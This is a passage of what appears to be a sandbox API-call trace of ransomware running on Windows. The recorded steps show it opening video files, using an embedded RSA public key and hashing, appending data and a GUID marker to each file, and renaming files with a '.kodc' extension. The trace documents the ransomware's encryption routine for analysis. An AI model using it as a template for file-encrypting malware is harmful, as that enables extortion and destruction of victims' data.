lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c898 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.577] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x8393, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x8393, lpOverlapped=0x0) returned 1 [0100.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.578] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8398, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.578] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.578] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.579] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.579] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.579] CloseHandle (hObject=0x5cc) returned 1 [0100.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0100.586] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vq g FTFubq5cA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vq g ftfubq5ca.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vq g FTFubq5cA.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vq g ftfubq5ca.flv.kodc")) returned 1 [0100.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.587] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.588] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3dd65c0, ftCreationTime.dwHighDateTime=0x1d5c5cc, ftLastAccessTime.dwLowDateTime=0xf79bc2c0, ftLastAccessTime.dwHighDateTime=0x1d5bc55, ftLastWriteTime.dwLowDateTime=0xf79bc2c0, ftLastWriteTime.dwHighDateTime=0x1d5bc55, nFileSizeHigh=0x0, nFileSizeLow=0x62c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwSL.flv", cAlternateFileName="")) returned 1 [0100.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.589] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WwSL.flv") returned=".flv" [0100.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WwSL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wwsl.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.589] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=25280) returned 1 [0100.589] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.592] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x629a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.592] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.593] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.594] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x62c0, lpOverlapped=0x0) returned 1 [0100.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.594] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.595] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.595] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.595] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.595] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.595] GetLastError () returned 0x0 [0100.596] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.596] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.596] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.596] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.596] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x62c0) returned 0x9ba8d90 [0100.596] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c898 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c8e0 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.597] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7da0 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7d88 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.598] GetCurrentThreadId () returned 0x42c [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7108 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.599] GetCurrentThreadId () returned 0x42c [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7db8 [0100.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.602] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x62c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.602] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.602] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.602] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.602] CloseHandle (hObject=0x5cc) returned 1 [0100.607] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WwSL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wwsl.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WwSL.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wwsl.flv.kodc")) returned 1 [0100.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: 